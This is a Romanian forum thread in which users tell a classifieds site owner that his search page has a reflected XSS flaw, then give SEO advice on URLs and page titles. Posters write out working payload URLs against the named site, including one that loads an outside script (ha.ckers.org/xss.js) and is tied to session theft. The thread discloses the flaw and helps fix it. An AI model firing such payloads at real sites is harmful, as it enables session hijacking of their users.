URL rewrite

[stynky1]

Era de neatentie mai mult. Incurcam afisarile intre ele...

[Hertz]

Off: Siteul e vulnerabil XSS

[stynky1]

Adica?

Da-mi mai multe detalii, pentru ca sincer sunt interesat.

Multam ptr replay!

[Hertz]

Cod:

http://www.web-anunturi.ro/index.php?Search=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&Cauta=Cauta

Baga un htmlentities().

[Agkelos]

Adica?

Da-mi masi multe detalii, pentru ca sincer sunt interesat.

Nu sanitizezi variabilele folosite. Da-i sa caute <script>alert(1)</script>. Identic se pot injecta alte coduri JavaScript pentru furtul de sesiuni.

Foloseste htmlentities() sau, mai bine, expresii regulate ca sa elimini din sirul de cautare toate caracterele care nu au ce cauta acolo ( ex. <, >, (, ) etc).

[Hertz]

Off: Legat de sesiuni,uite... http://www.web-anunturi.ro/index.php?Search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%3CB%3E&Cauta=Cauta

[stynky1]

Ok am sa fac astea...
10x ptr replay. Va anunt cand e gata, pentru alte pareri:P.

[stynky1]

Gata, am bagat htmlentities.
 Alte sfaturi mai aveti:D?

[Agkelos]

Alte sfaturi mai aveti:D?

M-am uitat prin meniu si am vazut ca toate linkurile sunt catre /anunturi-c[0-9].html. Ar fi bine daca le-ai face de forma /anunturi-(sectiune)-c[0-9].html. Ar aparea cuvantul cheie in numele fisierului ceea ce te ajuta atat in SERP cat si la AdSense.

O alta chestie, titlul si descrierea sunt identice pe toate paginile (sau cel putin pe cele cateva pe care m-am uitat). Asta e foarte rau pentru crawlere. Fiecare pagina trebuie sa aiba identitate proprie.

[stynky1]

Partea proasta la toata faza asta e ca site-ul e facut cu sabloane smarty, si sincer m-am gandit ca ar trebui sa schimb cuvintele cheie , dar inca nu mi-a venit o idee cum as putea sa fac acest lucru. In admin am un camp pentru cuvinte cheie, dar inca ma gandesc cum as putea sa le schimb , pentru fiecare categorie principala in parte.

Referitor la faza cu linkurile o sa ma gandesc in seara asta si cred ca o sa o rezolv destul de repede.

10x pentru sfat

[SkullAds]